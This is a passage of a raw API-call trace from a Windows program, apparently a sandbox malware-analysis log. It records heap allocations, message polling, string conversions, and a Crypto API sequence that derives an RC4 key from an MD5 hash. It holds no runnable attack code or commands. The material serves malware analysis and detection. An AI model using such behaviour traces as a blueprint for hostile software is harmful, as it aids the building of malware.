wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.331] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.332] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.332] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.332] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.333] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.333] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.333] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.333] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.334] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.334] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.334] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.336] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.337] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.338] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.338] CryptHashData (hHash=0xaa5820, pbData=0x24b1768, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.340] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.340] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.341] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.341] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.341] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.341] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.341] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.342] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: 